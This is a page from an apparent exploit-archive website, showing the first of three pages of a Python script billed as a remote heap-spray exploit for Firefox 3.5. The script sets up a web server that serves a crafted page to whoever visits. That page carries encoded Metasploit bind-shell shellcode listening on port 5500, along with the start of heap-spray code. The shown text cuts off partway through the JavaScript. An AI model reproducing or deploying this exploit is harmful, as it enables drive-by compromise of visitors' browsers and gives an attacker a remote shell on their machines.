Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > Exploit > Content
Hot Articles
MyBulletinBoard (MyBB)
Joomla Component com_con
deV!Lz Clanportal [DZCP]
Discuz! 6.0.1 (searchid)
Boonex Dolphin 6.1.2 Mul
AuraCMS
pmaPWN! - phpMyAdmin Cod
SMF Mod Member Awards 1.
WarFTP 1.65 (USER) Remot
CMailServer 5.4.6 (CMail
VIVOTEK and NUUO Team Up
Mozilla Firefox 3.5 (Fon
OllyDBG v1.10 and ImpREC
Joomla Component com_con
BoonEx Ray 3.5 (sIncPath
Recommend Articles
Safari + Quicktime
CMailServer 5.4.6 (CMail
trixbox (langChoice) Loc
BrewBlogger 2.1.0.1 Arbi
Joomla Component com_con
Mole Group Last Minute S
BoonEx Ray 3.5 (sIncPath
Dreampics Builder (page)
Download Accelerator Plu
OllyDBG v1.10 and ImpREC
DreamNews Manager (id) R
gapicms 9.0.2 (dirDepth)
Million Pixels 3 (id_cat
Maian Cart 1.1 Insecure
Maian Music 1.0 Insecure
New Articles
ARM ifconfig eth0 and As
HP Data Protector Media
Winamp 5.5.8 (in_mod plu
Hanso Converter 1.1.0 .o
Fat Player Media Player
Comet Bird 3.6.10 Crash
PHP Hosting Directory 2.
MySQl 5.1 DLL Hijacking
Opera Denial of Service
Multiple Buffer Overflow
Postcard Mentor - Databa
Catalog Manager Database
My Vacation Tracker DLL
Microsoft Internet Explo
linux/x86 setreuid(0,0)
Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit
  Add date: 07/25/2009   Publishing date: 07/25/2009   Hits: 321
Total 3 pages, Current page:1, Jump to page:
 

#!/usr/bin/env python
#######################################################
#
# FireFox 3.5 Heap Spray Exploit
# Originally discovered by: Simon Berry-Bryne
# Pythonized by: David Kennedy (ReL1K) @ SecureState
#
#######################################################
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys

class myRequestHandler(BaseHTTPRequestHandler):

  def do_GET(self):
    self.printCustomHTTPResponse(200)
    if self.path == "/":
        target=self.client_address[0]
        self.wfile.write("""
<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Exploit
</br>
Discovered by: SBerry aka Simon Berry-Byrne
Pythonized: David Kennedy (ReL1K) at SecureState
Bind Shell Port: 5500
Encoding: Shikata_Ga_Nai
</br>
<div id="content">
<p>
<FONT>                            
</FONT>
</p>
<p>
<FONT>Ihazacrashihazacrash</FONT></p>
<p>
<FONT>Ohnoesihazacrashhazcrash</FONT>
</p>
<p>
<FONT>Aaaaahhhhh  </FONT>
</p>
</div>
<script language=JavaScript>

// windows/shell_bind_tcp - 317 bytes http://www.metasploit.com LPORT=5500 encoding=shikata_ga_nai
var shellcode= unescape("%u6afc%u4deb%uf9e8%uffff%u60ff%u6c8b%u2424%u458b%u8b3c%u057c%u0178%u8bef" +
   "%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca" +
   "%uc201%uf4eb%u543b%u2824%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01" +
   "%u2c03%u898b%u246c%u611c%u31c3%u64db%u438b%u8b30%u0c40%u708b%uad1c%u408b" +
   "%u5e08%u8e68%u0e4e%u50ec%ud6ff%u5366%u6866%u3233%u7768%u3273%u545f%ud0ff" +
   "%ucb68%ufced%u503b%ud6ff%u895f%u66e5%ued81%u0208%u6a55%uff02%u68d0%u09d9" +
   "%uadf5%uff57%u53d6%u5353%u5353%u5343%u5343%ud0ff%u6866%u7c15%u5366%ue189" +
   "%u6895%u1aa4%uc770%uff57%u6ad6%u5110%uff55%u68d0%uada4%ue92e%uff57%u53d6" +
   "%uff55%u68d0%u49e5%u4986%uff57%u50d6%u5454%uff55%u93d0%ue768%uc679%u5779" +
   "%ud6ff%uff55%u66d0%u646a%u6866%u6d63%ue589%u506a%u2959%u89cc%u6ae7%u8944" +
   "%u31e2%uf3c0%ufeaa%u2d42%u42fe%u932c%u7a8d%uab38%uabab%u7268%ub3fe%uff16" +
   "%u4475%ud6ff%u575b%u5152%u5151%u016a%u5151%u5155%ud0ff%uad68%u05d9%u53ce" +
   "%ud6ff%uff6a%u37ff%ud0ff%u578b%u83fc%u64c4%ud6ff%uff52%u68d0%uceef%u60e0" +
   "%uff53%uffd6%u41d0");
oneblock = unescape("%u0c0c%u0c0c");

 

Other pages: : 1 * 2 * 3 * Next>>
Prev:MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u) Heap Overflow PoC Next:MixSense 1.0.0.1 DJ Studio (.mp3 file) Crash Exploit

Comment:

Category: Home > Exploit
Home